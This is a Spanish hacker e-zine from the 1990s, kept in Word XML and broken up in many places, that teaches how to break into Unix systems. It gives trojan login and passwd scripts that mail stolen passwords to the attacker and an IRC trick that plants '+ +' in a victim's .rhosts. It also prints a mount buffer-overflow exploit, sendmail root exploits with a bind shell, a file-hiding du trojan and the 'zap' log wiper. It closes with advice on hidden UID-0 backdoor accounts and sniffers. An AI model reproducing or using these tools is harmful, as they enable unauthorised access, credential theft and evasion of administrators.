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b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Comic Sans MS" w:cs="Comic Sans MS" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La Revista de Kike Nº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Comic Sans MS" w:cs="Comic Sans MS" w:ascii="Comic Sans MS" w:hAnsi="Comic Sans MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MARZ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sta revista es una recopilación de la mejor información qu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ircula por  la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itor: K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aboradores: Nadie :-(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***************************************************************************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D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* Apartado 1---------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Definición de termin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* Apartado 2--------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passwords de Un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>* Apartado 3-----------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hackeando Un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* Apartado 4-----------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shells de UN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* Apartado 5-----------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>El Bug del 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* Apartado 6------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Llave Maest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* Apartado 7----------------------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IR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*************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inición de Termino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MINISTRADOR--&gt; Persona que se encarga de todas las tareas de mantenimi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de un sistema informatic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ACKDOOR--&gt; Puerta de entrada trasera a una computadora, programa o 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en general. Sirve para acceder sin usar un procedimiento norm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LUE BOX--&gt; Aparato (o programa de computadora) que emite ton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multifrecuencias que permiten controlar las centr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elefonicas. Se usa para lograr comunicaciones gratuita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entre otras cos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UG--&gt; Un error o un programa o en un equipo. Se habla de BUG si es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error de dise¤o, no cuando la falla es provocada por otra cos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ALLING CARD--&gt; Tarjeta de credito emitida por una compa¤ia telefon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que permite hacer llamdas y pagarlas desp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ARDINF--&gt; Arte de abusar de targetas de credi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LAVE--&gt; Se usa como sinonimo de password, tambien puede ser el codi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que permite desencriptar un da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ORTAFUEGO (FIREWALL)--&gt; Computadora que registra todos los paquet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informacion que entran en una compa¤ia par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una vez verificados, derivarlos a otra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tiene conexion interna y no recibe archiv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que no provengan de aquell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IAL-UP--&gt; Linea de datos que permite a un usuario acceder por mode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una red o a una computado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OGIN--&gt; Procedimiento de identificarse frente a un sistema para lue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usar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OOPS--&gt; Circuitos. Un LOOP de telefonos son dos telefonos que se comuni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entre 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UTDIAL--&gt; Modem de salida dentro de una red, que permite a un usuari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la misma salir a la red telefonica convencional. Los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permiten hacer llamadas de larga distancia se llaman "glob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outdial" (outdial globales) o G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ASSWORD--&gt; Palabra que sirve para verificar que un usuario es real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quien dice ser, por esto mismo, el unico que debe conocer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es ese mismo usua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ATCH--&gt; En ingles, parche. Modificacion de un programa ejecutable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olucionar un problema o para cambiar su comportami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BX--&gt; Private Branch Exchange. Centrales telefonicas internas de Empres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D BOX--&gt; Aparato que permite enga¤ar a un telefono publico norteamerica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para que se comporte como si se depositaran monedas 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OOT--&gt; Cuenta del administrador en UNIX. Es la mas poderosa, permite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cceso a todo el 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NIX--&gt; Sistema operativo utilizado por la gran mayoria de maquina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nter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ICACION DE LOS FICHEROS PASSWD DE UNIX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Raven Spir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 este documento explicar‚ la estructura de los ficheros passwd de UN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mayor¡a de la informaci¢n est tomada de alt.2600/#hack FAQ, yo me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ado a traducirla, ordenarla y ampliarla un poco. Al gra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o habreis podido observar, el fichero de passwd tiene varias linea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ecidas a est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pe:1qwP95nmh6:1845:14:Pepe P‚rez:/home/users:/bin/b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a linea contiene 7 campos separados por ":", donde encontramo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gin : Pep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assword encryptado: 1qwP95nmh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£mero de usuario:18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£mero de grupo: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rmaci¢n  Gecos: Pepe P‚re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orio HOME: /home/u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ll:/bin/b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ro no todo es tan fcil ricos, PORQUE si por casualidad en el campo d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word encryptado haya un "*" o una "x", o cualguier otro s¡mbolo ,es deci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pe:*:1845:14:Pepe P‚rez:/home/users:/bin/bash  o algo como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pe:x:1845:14:Pepe P‚rez:/home/users:/bin/b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iere decir que el password est "shadowed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 shadowing es una medida de seguridad, que consiste en meter los passwor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 otro fichero aparte. Aqu¡ est una lista de su localizaci¢n ( La mayor¡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 las veces ) Lo podeis encontrar en los siguientes directorio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e de Unix        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IX 3                 /etc/security/passwd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 xml:space="preserve">/tcb/auth/files/&lt;first letter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f username&gt;/&lt;usernam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/UX 3.0s             /tcb/files/auth/?/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SD4.3-Reno           /etc/master.passwd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vexOS 10           /etc/shadpw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vexOS 11           /etc/shadow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G/UX                 /etc/tcb/aa/user/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P/IX                 /etc/shadow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P-UX                 /.secure/etc/passwd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RIX 5                /etc/shadow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nux 1.1             /etc/shadow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SF/1                 /etc/passwd[.dir|.pag]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O Unix #.2.x        /tcb/auth/files/&lt;first letter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f username&gt;/&lt;usernam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nOS4.1+c2           /etc/security/passwd.adjunct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nOS 5.0             /etc/sha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&lt;optional NIS+ private secure maps/tables/whatever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ystem V Release 4.0  /etc/shadow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 V Release 4.2  /etc/security/* data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ltrix 4              /etc/auth[.dir|.pag]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ICOS                /etc/udb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hora bien, por ahora parece facil ¨ Eh ?. Bueno, pues en algunos sistemas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 que hay mucha seguridad, este fichero es ilegible para la mayor¡a de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uarios del sistema, y por supuesto para nosotr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 el caso de que no se pueda leer haremos un programa de este tip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pwd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(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uct passwd *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(p=getpwent(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f("%s:%s:%d:%d:%s:%s:%s\n", p-&gt;pw_name, p-&gt;pw_passw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-&gt;pw_uid, p-&gt;pw_gid, p-&gt;pw_gecos, p-&gt;pw_dir, p-&gt;pw_shell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e programa hace varias llamadas a getpwent() para que el fichero passw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 enviado directamenta a vuestro ordenador, con lo que de Shadowing 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spero que os haya servido de ayuda, si teneis algun tipo de duda o comentari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 dudeis en escribirme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venspirit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VEN SPIR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CKEANDO UNIX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RAVEN SPIR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a a todos. Espero que los que leais este documento comprendais como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ckea un unix. En mis frecuentes visitas al IRC mucha gente pregunta sobre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etc/passwd, mucha gente anda buscando diccionarios de palabras y otros tan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can el mejor crackeador. ¨ para  que ?. Hay maneras mucho mas rapidas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 supuesto divertidas de conseguir una cuenta. Y por supuesto es demasi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icil desencriptar la cuenta del root, por lo que solo se utiliza en cas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remos, asi como los programas tipo dictmake solo se usan en casos muy rar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 cuando no nos queda otro recur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ezamos. Antes de empezar me gustaria que quedara claro que si quereis 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ckers en serio necesitais linux, no es absolutamente necesario pero facili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chisimo las cos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 hackear un unix la primera cosa que necesitamos es, logico, introducir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 el sistema. Algunos otros ordenadores tienes ftpïs anonimos a los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demos acceder, pero hacedme caso, no servir para na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 introducirnos en un sistema necesitamos que tenga al menos una parte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o publico. Generalmente esa parte es la famosa pantalla " Login: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word: " que me imagino que todos conocere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a pantalla simplemente vale para identificar que la entrada de un usua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 ese sistema sa legitima. Sin embargo esas tontas maquinas que solo sab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diferencia entre 0 y 1 si les damos un login y password que esten da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 alta en ese sistema nos dejara pasar ( a no ser que tengan un sistem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nocimiento de IP para lo que necesitariamos  hacer IP-Spoofing , pero es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o nos ocurrira en ciertos ordenadores de alta seguridad ). ¨ Como consegu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o al sistema ? La manera mas facil, la ingenieria social. No creo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ga falta explicar eso. Simplemente podeis utilizar en comando finger,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 que useis linux y los que no usais el finger del mIrc. Este comando n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a informacion sobre el titular del e-mail que nostros le demos, que se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maquina sera, o mas o menos o a veces nada. Menos da una piedra. Si esta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de linux podeis usar comandos "r" como "rlogin loquesea.com -l loginquesea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o os mete en el sistema, pero hay que conseguir una cuenta para poder us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 exploits que explicar‚ mas adelante. Sin embargo hay otras manera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eguir acceso al sistema, como por ejemplo la que explico aho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O ACCEDER A UN ORDENADOR HACKEANDO DESDE EL IR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o solo lo podeis hacer desde linux, yo lo he probado desde win95 y 3.1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lo he conseguido hacer. Primero hacemos un /whois #uncanalconmuchag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 encontrar si hay alguien que se conecte desde un unix, que normal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 una universidad. El unico problema que tiene esto es que no pode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gir el ordenador, pero de todas maneras es muy diverti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 unico que necesitamos es meter la cadena + + en su fichero /.rhosts y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dad es que es una tonteria tremen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camos a la victima y vamos a un canal donde este el, despues le hablare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de un privado. Ahora entra la imaginacion de cada uno, porque tenemos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darle un fichero por DCC ( por ejemplo prueba.irc ) y que el escrib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load prueba.irc Me imagino que vuestra imaginacion os ayudara a resolverl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 primero es conseguir el fichero prueba.irc. Solo esta linea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/exec echo: "/exec echo + + &gt; $HOME/.rhosts &gt;&gt; prueba.ir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a tenemos el fichero prueba, lo mejor es que para que no se de cuenta pode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¤adirle alguna conachada que se nos ocurra ( alla cada uno se las apa¤e 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sto. Cuando el tio en cuestion escriba /load prueba.irc nosotros ejecuta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% rlogin ordenador_de_la_victima.com -l login_de_la_victi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a estamos dentro. Facil ¨ No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 para terminar un truquillo que quizas os valga para algo, simple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mbiamos la paridad de nuestro modem a 7E1 y telneteamos al ordenador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estion. Si hemos tenido suerte, cuando alguien intente conectarse, n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colaremos" en su lug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pues de todo esto se supone que ya estamos dentro. Ahora hay que, o sac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 cuenta si no la tenemos o conseguir privilegios de root. Para lo primer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Podemos usar el archirenombrado /ect/passwd ( si tenemos privilegios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erlo ) y crackearlo pero si quereis mi consejo solo usad el fichero passw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 conseguir una cuenta cualquiera en el sistema y poder ejecutar coman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 ‚l, poder usar un bug o explo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Usar un trojan o Caballo De Troya, esta opcion tambien requiere tiempo p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 supuesto menos que crackear el fichero passwd, por que funciona en cua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alguier usuario se conecte al sistema. ATENCION, si conseguimos la cuen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 root nos podremos saltar el paso " conseguir privilegios de root ", aun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 sysadmins, algunos, pueden sospechar aunque la verdad es que despu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ckear durante un tiempo te das cuenta de lo estupidos que pueden llega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. Quizas sea una de las mejores formas. Un caballo de troya es un fich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 metido en el sistema hace que un usuario crea que ha introducido s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word mal, pero en realidad el password es enviado a la direccion de corre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 nosostros le digamos. Aqui incluyo uno, pero acordaos de ponerl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cion a la que quereis que os mande el passwd, y ademas en algun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stemas en lugar de "Login:" nos dice : "marte login: " o algo distint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in, por lo que tambien lo tenemos que cambiar para que nadie not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erencia. Este e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SCRIPT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!/bin/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m -rf $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p $HOME/.login $HOME/.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''&gt;$HOME/.hushlo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stty intr '^@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'Login incorrect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-n 'login: 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$&lt;&gt;.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-n 'Password: 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ty -ec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$&lt;&gt;&gt;.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l tunombre@tudirecciondecorreoanonima&lt;.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m .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 /etc/mot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v .l .lo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m .hushlo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ty ec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rce .login"&gt;$HOME/.lo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END SCRIPT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e tipo de scripts tambien se pueden usar en /bin/passwd, para cuando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uario cambie su contrase¤a pero el problema es que no es muy normal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 usuario cambie su contrase¤a, o por lo menos pasa muy de vez en cuan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 mayor seguridad lo mejor es poner el que esta arriba,( para el caso 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jor poner los dos ) pero sin embargo aqui pongo el otro, por si aca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 acordaos de la direccion de correo )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SCRIPT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!/bin/tc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-n "Changing password for $USER on ";host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-n "Old password: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ty -ec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$&lt;&gt;$HOME/.ty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cho "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-n "New password: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$&lt;&gt;&gt;$HOME/.ty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ty ec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l tunombre@tudirecciondecorreoanonima&lt;$HOME/.ty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m $HOME/.ty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Error: Incorrect Passwor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m -f $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lias /bin/passw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lias passw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END SCRIPT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ventaja que tienen estos dos scripts es que no influye que el fich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wd este shadowed o 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o que con esto nos llega para conseguir una cuenta en un ordenador norm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amos a lo siguiente, conseguir los privilegios de r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 conseguir privilegios de root en un sistema NO hace falta desencrip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cuenta del root del fichero passwd. Para ser root recurrimos a los bugs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os exploits. Los bugs son "agujeros" en el dise¤o del SSOO y se suel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contrar en listas de correo de seguridad, aunque hay algunas webs do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an recopilados. Los exploits son programas que utilizan esos bugs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eguirnos privilegios de root, aunque no es para lo unico que sirven,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fiero a que podemos usar un exploit para leer el correo de alguien,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cultar lo que estemos haciendo en el ordenador etc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 exploits son ficheros de codigo .c que hay que compilar en el ordena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hackear. Se meten por ftp y se compil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% cc -o loquesea loquesea.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% loques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sto. Hay algunos que requieren una manera especial de utilizacion, p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 indica claramente si editamos el fiche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 bugs y exploits suelen estar clasificados por sistemas, para que sea m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il localizarlos. La verdad es que os recomiendo tener los exploits y bu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 vuestro ordenador ordenados por directorios, para que no perdais el tiem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paciencia buscandol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 que tengais alguna ayuda os voy a poner aqui unos cuanto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zas este ya lo conozcais, es el mount, y funciona en casi todos los linux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-------------------------------------CORTAD AQUI---------------------------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* Mount Exploit for Linux, Jul 30 19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overed and Coded by Bloodmask &amp; V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in Security 19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unistd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tdio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tdlib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fcntl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ys/stat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PATH_MOUNT "/bin/umoun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BUFFER_SIZE 10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DEFAULT_OFFSET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_long get_esp(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__asm__("movl %esp, %eax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(int argc, char **argv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_char execshell[]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"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f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"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xc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"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"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har *buff = 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nsigned long *addr_ptr = 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har *ptr = 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t i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t ofs = DEFAULT_OFFSE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uff = malloc(4096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(!buf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printf("can't allocate memory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exit(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tr = buff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/* fill start of buffer with nops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emset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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tr += BUFFER_SIZE-strlen(execshell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/* stick asm code into the buffer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(i=0;i &lt; strlen(execshell);i++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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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(i=0;i &lt; (8/4);i++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*(addr_ptr++) = get_esp() + of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tr = (char *)addr_pt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*ptr =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void)alarm((u_int)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rintf("Discovered and Coded by Bloodmask and Vio, Covin 1996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xecl(PATH_MOUNT, "mount", buff, NULL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--------------------------------------FINAL--------------------------------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e otro exploit os dara un shell de root en los ordenadores que us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dmail 8.6.4, este es el codigo original, leed las lineas que empiecen p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 porque es lo que teneis que escribir vosotros por que es distinto en c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stem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--------------------------------CORTAD AQUI--------------------------------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 location of send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DMAIL=/usr/lib/send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 location of original sendmail.cf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IG=/nau/local/lib/mail/sendmail.c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CONFIG=`strings $SENDMAIL | grep sendmail.cf`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 program to execute as ro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LL=/bin/c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MPDIR=/tmp/sendbug-tmp.$$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kdir $TEMPD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mod 700 $TEMPD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 $TEMPD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p $SENDMAIL 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mod 700 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Creating setid0 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 &gt; setid.c &lt;&lt; _EOF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* set uid to zero, thus escaping the annoying csh and solaris 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problem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if (getuid() != geteuid()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 printf("permission denied, you root-hacker you.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 exit(1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.. must be run euid 0, obviously.  with no args it runs /bin/s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otherwise it runs the 1st ar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tdio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(argc, argv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 argc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 *argv[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t ui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etuid(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etgid(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eteuid(0);  /* probabally redundant.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etegid(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id = getuid(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f (uid != 0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ntf("setuid(0); failed!  aborting..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it(1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f (argc !=2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ntf("executing /bin/sh...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ystem("/bin/sh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ntf("executing %s...\n", argv[1]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ystem(argv[1]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EOF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c -o setid0 setid.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Creating calc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 &gt; calc.c &lt;&lt; _EOF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Determines offset in sendmai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sendmail.cf file lo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author: timothy newsh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fcntl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core(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t pi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t fd[2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(pipe(fd) &lt; 0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error("pipe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xit(1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turn(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id = fork(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(!pid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t f = open("./out", O_RDWR|O_CREAT, 0666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up2(f, 1); dup2(fd[0], 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lose(f); close(fd[1]); close(fd[0]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xecl("./sm","sm","-d0-9.90","-oQ.","-bs", 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error("exec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xit(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} else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leep(2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kill(pid, 11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ose(fd[0]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ose(fd[1]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(argc,argv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 **argv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 argc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signed int ConfFile,tTdvect,off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encore(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ync();   /* grr.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Tdvect = find("ZZZZZZZZ", "core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fFile = find(argv[1], "core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(!tTdvect || !ConfFile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turn(1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ff = ConfFile - tTdvec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ntf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n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ff, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5, 's',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ff+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+1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 find(pattern, fi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 *pattern,*fil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t f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t i, add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 c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d = open(file, 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 =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dr =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ile(read(fd, &amp;c, 1) == 1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pattern[i] == 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i++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i=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pattern[i] == '\0'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addr -= strlen(pattern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return(addr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ddr++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turn(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EOF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c calc.c -o cal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Scanning core image for $CONFIG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BUGFLAGS=`calc $CONFIG`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Creating alias.sh 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#!/bin/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 this program will be executed when mail is sent to the fake ali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 since solaris sh and csh and tcsh refuse to run when euid != realui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 we instead run the program we compiled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bin/chmod 6777 $TEMPDIR/setid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bin/chown root $TEMPDIR/setid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bin/sy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 &gt; alias.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mod 755 alias.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Creating fake alias file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yash: |$TEMPDIR/alias.sh" &gt; alia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Faking alias pointer in new config file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grep -v '(OA|DZ|Ou|Og)' $CONFIG &gt; /tmp/sm.c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 hacks fo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A/$TEMPDIR/aliases                     # our fake alias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0                                     # user ID to run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0                                     # group ID to run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ZWHOOP-v1.0" &gt;&gt; /tmp/sm.c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Creating the sendmail script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 &gt; sendmail.script &lt;&lt; _EOF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l from: &lt;nobody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cpt to: &lt;yas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t another sendmail hole?  suid whoop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\.                                      # oops.. delete \ prior to execu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EOF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Executing $SENDMAIL $DEBUGFLAGS -bs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$SENDMAIL $DEBUGFLAGS -bs &lt; sendmail.scri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 give it time to execu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eep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 cleanup in 5 sec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leep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf)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[ -u setid0 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cho "setid0 is a suid shell.  executing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d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$TEMPDIR/setid0 /bin/c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cho "end of scrip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xit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cho "setid0 is not suid; script fail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cho "apparently, you don't have the bug.  celebrate :-)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xit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----------------------------------FINAL-------------------------------------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e otro os har root en los ssoo con el sendmail 4.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-------------------------------CORTAR AQUI----------------------------------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!/bin/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 Uso: smail &lt;hostname&gt; &lt;target-user-name&gt; &lt;target-port&gt; &lt;shell command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 Defecto: smail &lt;localhost&gt; &lt;daemon&gt; &lt;7001&gt; &lt;/bin/s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t=$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r=$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d=$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[ -z "$2" ];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ser=dae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[ -z "$3" ];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ort=7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[ -z "$4" ];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md="/bin/csh -i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eep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helo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mail from: |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rcpt to: bounc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data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eep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mail from: $us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rcpt to: | sed '1,/^$/d' | sh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data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cat &gt; /tmp/a.c &lt;&lt;EOF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 &lt;&lt;  E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ys/types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ys/signal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ys/socket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netinet/in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netdb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p(){int s;while(wait(&amp;s)!=-1);}main(ac,av)int ac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 **av;{struct sockaddr_in mya;struct servent *s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;fd_set muf;int myfd,new,x,maxfd=getdtablesize(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gnal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREA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))&lt;0)exit(1);mya.sin_family=AF_INET;bzero(&amp;mya.sin_add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zeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"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(struct servent *)0){if(atoi(av[1])&lt;=0)exit(1);mya.sin_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htons(atoi(av[1]));}else mya.sin_port=sp-&gt;s_port;if(bind(myf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truct sockaddr *)&amp;mya,sizeof(mya)))exit(1);if(listen(myf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&lt;0)exit(1);loop: FD_ZERO(&amp;muf);FD_SET(myfd,&amp;muf);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elect(myfd+1,&amp;muf,0,0,0)!=1||!FD_ISSET(myfd,&amp;muf))go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p;if((new=accept(myfd,0,0))&lt;0)goto loop;if(fork(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0){for(x=2;x&lt;maxfd;x++)if(x!=new)close(x);for(x=0;x&l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SIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup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0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new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to loop;}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EOF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cd /t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/bin/cc /tmp/a.c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/bin/rm a.c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/tmp/a.out $port $cm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"qui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) | mconnect $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------------------------------------FINAL-----------------------------------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 por ultimo este otro, que no es para ser root, si no para ocultar ficher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 un directorio, que no se veran al hacer "ls". Este fichero se  copia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bin/ls sobreescribiendo al origi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 de siempre, es el codigo original, leed los /*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----------------------------------CORTAR AQUI-------------------------------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fndef l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c</w:t>
        <w:tab/>
        <w:t>char sccsid[] = "@(#)du.c 1.1 91/11/13 SMI"; /* from UCB 4.11 83/07/01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d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tdio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ys/param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ys/stat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ys/dir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</w:t>
        <w:tab/>
        <w:t>path[BUFSIZ], name[BUFSIZ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</w:t>
        <w:tab/>
        <w:t>afl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</w:t>
        <w:tab/>
        <w:t>sfl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</w:t>
        <w:tab/>
        <w:t>*dot = "."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ML</w:t>
        <w:tab/>
        <w:t>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uct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t</w:t>
        <w:tab/>
        <w:t>dev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o_t</w:t>
        <w:tab/>
        <w:t>ino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 ml[ML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</w:t>
        <w:tab/>
        <w:t>mlx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*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 Hack vars - oops they're glob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 but wtf cares, its a h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FILENAME "/dev/pty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STR_SIZE 12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SEP_CHAR " \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SHOWFLAG        /*  Able to get du stats with `du -/` command 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uct  h_st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truct h_st     *nex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har            filename[STR_SIZE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uct  h_st    *hack_lis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uct  h_st    *h_t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    tmp_str[STR_SIZE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   *fp_hac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     showall=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</w:t>
        <w:tab/>
        <w:t>descend(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</w:t>
        <w:tab/>
        <w:t>*index(), *rindex(), *strcpy(), *sprintf(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</w:t>
        <w:tab/>
        <w:t>kb(n)</w:t>
        <w:tab/>
        <w:t>(howmany(dbtob(n), 1024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(argc, argv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t argc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har **argv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ng blocks =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gister char *n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t pi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t c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xtern int opti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f defined (SHOWFLA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hile ((c = getopt(argc, argv, "as/")) != -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hile ((c = getopt(argc, argv, "as")) != -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witch (c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ase 'a'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aflg++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ase 's'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flg++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f defined (SHOWFLA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    case '/'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howall++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end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efaul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(void)fprintf(stderr, "Usage: du [-as] file . . .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xit (2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*+  Read in list of files to block  +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_tmp=(struct h_st *)malloc(sizeof(struct h_st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ack_list=h_t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 (fp_hack=fopen (FILENAME, "r")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while (fgets(tmp_str, 126, fp_hack)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h_tmp-&gt;next=(struct h_st *)malloc(sizeof(struct h_st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strcpy (h_tmp-&gt;filename, tmp_str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h_tmp-&gt;filename[strlen(h_tmp-&gt;filename)-1]='\0'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h_tmp=h_tmp-&gt;nex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_tmp-&gt;next=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*+  On with the program  +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rgc -= opti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rgv += opti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(argc == 0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rgv = &amp;do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rgc = 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o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(argc &gt; 1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id = fork(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(pid == -1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fprintf(stderr, "No more processes.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xit(1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(pid !=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wait((int *)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(argc == 1 || pid == 0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(void) strcpy(path, *argv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(void) strcpy(name, *argv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(np = rindex(name, '/')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*np++ = '\0'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if (chdir(*name ? name : "/") &lt; 0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perror(*name ? name : "/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exit(1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} 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np = path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blocks = descend(path, *np ? np : ".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(sfl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rintf("%ld\t%s\n", kb(blocks), path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(argc &gt; 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exit(1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rgc--, argv++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} while (argc &gt; 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xit(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/* NOTREACHED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</w:t>
        <w:tab/>
        <w:t>*dirp = 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end(base, name)  /*  Cool tree spanning idea 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har *base, *na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har *ebase0, *ebas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truct stat stb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t i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ng blocks =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ng curoff = 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gister struct direct *d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/*+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This will be very lagged if you include alot of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because strstr() is such an expensive call.  Howe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the nature of this procedure requires it, and brea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* the pathname down would be just as expensive.  Not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that correct disk usage sizes will be reported ba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upon files that are not mas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(!showa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or (h_tmp=hack_list; h_tmp-&gt;next; h_tmp=h_tmp-&gt;nex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(strstr(base, h_tmp-&gt;filename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return 0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base0 = ebase = index(base, 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(ebase &gt; base &amp;&amp; ebase[-1] == '/'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base--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(lstat(name, &amp;stb) &lt; 0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error(base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*ebase0 =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 (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(stb.st_nlink &gt; 1 &amp;&amp; (stb.st_mode&amp;S_IFMT) != S_IFDIR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or (i = 0; i &lt;= mlx; i++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(ml[i].ino == stb.st_ino &amp;&amp; ml[i].dev == stb.st_dev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return (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(mlx &lt; ML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l[mlx].dev = stb.st_dev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l[mlx].ino = stb.st_ino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lx++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locks = stb.st_block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((stb.st_mode&amp;S_IFMT) != S_IFDIR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(afl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printf("%ld\t%s\n", kb(blocks), base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 (blocks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(dirp != NU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osedir(dirp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rp = opendir(name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(dirp == NULL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error(base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*ebase0 =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 (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(chdir(name) &lt; 0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error(base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*ebase0 =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osedir(dirp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dirp = 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eturn (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while (dp = readdir(dirp)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(!strcmp(dp-&gt;d_name, ".") || !strcmp(dp-&gt;d_name, ".."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ontinu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(void) sprintf(ebase, "/%s", dp-&gt;d_name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uroff = telldir(dirp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locks += descend(base, ebase+1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*ebase =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(dirp == NULL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dirp = opendir(".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f (dirp == NULL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error(".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return (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eekdir(dirp, curoff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losedir(dirp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rp = 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(sflg ==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rintf("%ld\t%s\n", kb(blocks), base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(chdir("..") &lt; 0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(void) sprintf(index(base, 0), "/..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error(base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exit(1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ebase0 =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return (blocks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---------------------------------------FINAL--------------------------------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gual que hay este hay un monton para cada sistema, para el ftp, para tel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c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pues de buscar, o bien el vuestro HD, o bien en las paginas web se sup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 tendreis los necesarios para ser root. Un consejo, si no funciona ningu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 los que teneis no useis los que son para otros sistemas o versiones, vamo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 no hagais cosas a lo loco, por que lo unico que haceis es dejar m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ellas en el siste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a es la parte mas dificil de todas, asi que espero que sepais solucionarl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 vez que ya somos root podemos hacer lo que queramos en ese sistema, p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debemos olvidarnos de borrar nuestras huellas. Los unix tienen varios lo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 guardan casi todo lo que hacemos en el sistema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UTMP: Este fichero guarda un registro de todos los usuarios que se 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ectado a ese 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irectorios: /etc/utmp o /var/adm/ut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WTMP: Este es nuestro peor enemigo. Guarda los numeros IP de todos los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han conectado al ordena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irectorios: /etc/wtmp o /var/adm/wt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LASTLOG: Este log guarda un registro del momento exacto en que un usua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ro por £ltima ve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irectorio: /var/adm/last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ACCT: Este log guarda los comandos que hemos ejecutado pero SOLO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andos no con que fin los hemos utilizado, pero suele estar desactiv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 la gran cantidad de memoria que necesita. (  Logico no?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irectorio: /var/adm/acct ( en algunos sistemas se puede llamar pacct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emas de esto  puede haber otros programas que registren tu entrada, como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CP-Wrapper o similares( Tened cuidado con el Syslog que viene con el ss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 guarda los logs en los ficheros especificados en /etc/syslog.conf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 todas maneras os recomiendo que hackeeis a horas que el root no pueda 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uestro numero IP con "who" o "users" porque os pillara. De la misma maner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primera vez que accedeis al sistema con una cuenta hackeada, haced muc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as que haria un usuario normal ( telnet, ftp, echar una partida al tetris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 que si el root os investiga "levemente" no se de cuenta de lo que habe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cho. Aqui incluyo el codigo de el "zap" que, como su nombre indica es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pper, o sea un programa que borra nuestras huellas el soli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compila como los exploits, pero cambia su ejecuc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% zap &lt;nombredeusuario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---------------------------------CORTAD AQUI--------------------------------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ys/types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tdio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unistd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ys/file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fcntl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utmp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pwd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lastlog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WTMP_NAME "/usr/adm/wt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UTMP_NAME "/etc/utm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LASTLOG_NAME "/usr/adm/lastlo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 f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d kill_utmp(wh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 *who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truct utmp utmp_en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t flag=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((f=open(UTMP_NAME,O_RDWR))&gt;=0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while(read (f, &amp;utmp_ent, sizeof (utmp_ent))&gt; 0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 (!strncmp(utmp_ent.ut_name,who,strlen(who))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bzero((char *)&amp;utmp_ent,sizeof( utmp_ent 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lseek (f, -(sizeof (utmp_ent)), SEEK_CUR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write (f, &amp;utmp_ent, sizeof (utmp_ent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flag++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lose(f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f(!flag) printf("Unsuccessful.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(argc,argv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 argc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 *argv[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har me[30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nt i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truct passwd *myentry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f (argc==1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yentry=getpwuid(getuid(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trcpy(me,myentry-&gt;pw_name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} else strcpy(me,argv[1]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intf("ZAPing %s.\n",me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kill_utmp(me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-----------------------------------FINAL------------------------------------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i la ultima entrada del usuario queda borrada del sistema. Si lo ejecuta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asiadas veces, pondr nombredeusuario Never Logged In , osea es como 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e usuario nunca se hubiera conectado al sistema. Ya tenemos las huel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radas, pero si queremos mantener esos privilegios que hacemo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manera mas facil es a¤adir una cuenta al /etc/passwd con el com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adduser" con numero de usuario 0 y numero de grupo 0 que son privileg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 roo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: que nadie se le ocurra borrar todas las cuentas del fichero passw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nos una que solo el conozca, por que, aunque nadie podria acceder al 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 persona con acceso fisico  podria detectarnos, y como poco borr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estra cuenta asi cerrandonos el acceso al sistema, siendo en vano todo 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 habiamos hech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 embargo si por casualidad al sysop en cuesti¢n se le ocurre revisar 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entas del fichero passwd la cagamos. Aunque es dificil, por que tendria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isar las cuentas 1 por 1 y es muy posible que se no se de cuenta, pero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y maniaticos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pues de hacer todo esto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enemos una cuenta con privilegios de ro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Hemos borrado nuestras huel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¨ Que nos queda ? Pues practicamente nada, salvo colocar un sniffer, progra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 nos facilitara logins y passwords de ordenadores a los que se conect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te de "nuestro" sistema. El problema 